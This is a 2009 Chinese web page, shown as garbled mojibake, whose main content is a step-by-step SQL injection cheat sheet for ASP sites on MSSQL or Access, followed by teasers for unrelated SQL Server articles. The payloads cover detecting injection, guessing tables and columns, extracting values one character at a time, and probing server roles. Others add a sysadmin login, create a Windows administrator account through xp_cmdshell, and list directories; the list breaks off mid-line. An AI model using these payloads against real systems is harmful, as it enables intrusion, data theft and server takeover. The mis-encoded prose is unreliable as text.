Ò׽ؽØÍ¼Èí¼þ¡¢µ¥Îļþ¡¢Ãâ°²×°¡¢´¿ÂÌÉ«¡¢½ö160KB

SQLÊÖ¹¤×¢Èë´óÈ«

±È·½ËµÔÚ²éѯidÊÇ50µÄÊý¾Ýʱ£¬Èç¹ûÓû§´«½üÀ´µÄ²ÎÊýÊÇ50 and 1=1£¬Èç¹ûûÓÐÉèÖùýÂ˵ϰ£¬¿ÉÒÔÖ±½Ó²é³öÀ´£¬SQL ×¢ÈëÒ»°ãÔÚASP³ÌÐòÖÐÓöµ½×î¶à£¬
¿´¿´ÏÂÃæµÄ
1.ÅжÏÊÇ·ñÓÐ×¢Èë
;and 1=1
;and 1=2
2.³õ²½ÅжÏÊÇ·ñÊÇmssql
;and user>0
3.ÅжÏÊý¾Ý¿âϵͳ
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4.×¢Èë²ÎÊýÊÇ×Ö·û
'and [²éѯÌõ¼þ] and ''='
5.ËÑË÷ʱû¹ýÂ˲ÎÊýµÄ
'and [²éѯÌõ¼þ] and '%25'='
6.²ÂÊý¾Ý¿â
;and (select Count(*) from [Êý¾Ý¿âÃû])>0
7.²Â×Ö¶Î
;and (select Count(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
8.²Â×Ö¶ÎÖмǼ³¤¶È
;and (select top 1 len(×Ö¶ÎÃû) from Êý¾Ý¿âÃû)>0
9.(1)²Â×ֶεÄasciiÖµ£¨access£©
;and (select top 1 asc(mid(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
(2)²Â×ֶεÄasciiÖµ£¨mssql£©
;and (select top 1 unicode(substring(×Ö¶ÎÃû,1,1)) from Êý¾Ý¿âÃû)>0
10.²âÊÔȨÏ޽ṹ£¨mssql£©
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(select IS_MEMBER('db_owner'));--
11.Ìí¼ÓmssqlºÍϵͳµÄÕÊ»§
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell 'net user username password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
12.(1)±éÀúĿ¼
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('Éϲ½µÃµ½µÄpaths'))>)
(2)±éÀúĿ¼
;create table temp(id nvarchar(255),num1 nvar


Ïà¹ØÎĵµ£º

AccessºÍSQL2000ÖÐÓï¾äµÄÇø±ð

1 £¬¶ÔÓÚÈÕÆÚ×Ö¶Î×Ö¶Î
access±íʾΪ£º#1981-28-12#
SQLSERVER2000±íʾΪ£º''1981-02-12''
2,SQLÓï¾äÇø±ð£¬select ,update ÔÚ¶Ôµ¥±í²Ù×÷ʱ¶¼²î²»¶à£¬
µ«¶à±í²Ù×÷ʱupdateÓï¾äµÄÇø±ðACCESSÓëSQLSERVERÖеÄUpdateÓï¾ä¶Ô±È:
SQLSERVERÖиüжà±íµÄUpdateÓï¾ä:
Update Tab1
SET a.Name = b.Name
from Tab1 a,Tab2 b
Whe ......

SQLSERVER SQLÐÔÄÜÓÅ»¯

1.Ñ¡Ôñ×îÓÐЧÂʵıíÃû˳Ðò(Ö»ÔÚ»ùÓÚ¹æÔòµÄÓÅ»¯Æ÷ÖÐÓÐЧ)¡¡¡¡
¡¡¡¡ SQLSERVERµÄ½âÎöÆ÷°´ÕÕ´ÓÓÒµ½×óµÄ˳Ðò´¦Àífrom×Ó¾äÖеıíÃû£¬Òò´Ëfrom×Ó¾äÖÐдÔÚ×îºóµÄ±í£¨»ù´¡±ídriving table£©½«±»×îÏÈ´¦Àí£¬ÔÚfrom×Ó¾äÖаüº¬¶à¸ö±íµÄÇé¿öÏ£¬±ØÐëÑ¡Ôñ¼Ç¼ÌõÊý×îÉٵıí×÷Ϊ»ù´¡±í£¬µ±SQLSERVER´¦Àí¶à¸ö±íʱ£¬»áÔËÓÃÅÅÐò¼°ºÏ²¢µÄ·½Ê½Á ......

SQLÓÃDataDiff²éѯµÄ¹ÖÏÖÏó¶øÒý·¢µÄ˼¿¼¡£¡£

½ñÌìÓÖ¿´µ½ÐÂ¼ÓÆÂµÄͬÊ·¢¹ýÀ´µÄÒ»¶ÎSQLÓï¾ä£¬»¹ÊÇÀÏÎÊÌ⣬ʱ¼ä¶Ô±ÈÖ±½ÓÓôóÓÚСÓںš£Ì¾ÁËÉùÆøºó£¬ÊÖ¶¯¸ø¸Ä³ÉdatediffÁË£¬¿ÉÊÇÒ»ÔËÐгö´í£¬´íÎóÌáʾÈçÏ£º
Msg 241, Level 16, State 1, Line 1
Conversion failed when converting datetime from character string.
ΪÁË˵Ã÷·½±ã£¬ÕâÀï¾Í¼ò»¯Ò»¸öÀý×ÓºÃÁË¡£
create tab ......

ÔÚsql server 2000Öе÷ÓÃϵͳʱ¼ä

select getdate()
ÊÇÏÔʾµ±Ç°ÏµÍ³Ê±¼ä£¬Êä³öµÄÈÕÆÚ¸ñʽÓë±¾»úÈÕÆÚ¸ñʽÓйأ¬¼ÙÈëÄãÏëÔÚʲôÇé¿ö϶¼ÏÔʾ³É2006-12-15 10:37:00ÕâÖÖÐÎʽÔòÐèҪת»»Ò»ÏÂ
select convert(varchar(30),getdate(),20)
ÏÔʾÊÇÐÇÆÚ¼¸µÄÓï¾äÊÇ
select datename(weekday,getdate())
ÈÕÆÚ¼ÓÐÇÆÚµÄ»°Ö±½Ó¼ÓÔÚÒ»¿é¾Í¿ÉÒÔÁË
select convert(varcha ......

SQL Server 2005 µÄĬÈÏʵÀýºÍÃüÃûʵÀýµÄÎļþλÖÃ

SQL Server 2005 Áª»ú´ÔÊ飨2008 Äê 11 Ô£©
SQL Server 2005 µÄĬÈÏʵÀýºÍÃüÃûʵÀýµÄÎļþλÖÃ
¸üÐÂÈÕÆÚ£º 2005 Äê 12 Ô 5 ÈÕ
Microsoft SQL Server 2005 µÄ°²×°°üº¬Ò»¸ö»ò¶à¸öµ¥¶ÀµÄʵÀý¡£ÎÞÂÛÊÇĬÈϵϹÊÇÃüÃûµÄʵÀý£¬¶¼ÓÐ×Ô¼ºµÄÒ»Ì׳ÌÐòÎļþºÍÊý¾ÝÎļþ£¬ÒÔ¼°Ò»Ì×ÔÚ¼ÆËã»úÉϵÄËùÓÐʵÀýÖ®¼ä¹²ÏíµÄ¹«¹²Îļþ¡£
¶ÔÓÚ°üº ......
© 2009 ej38.com All Rights Reserved. ¹ØÓÚE½¡ÍøÁªÏµÎÒÃÇ | Õ¾µãµØÍ¼ | ¸ÓICP±¸09004571ºÅ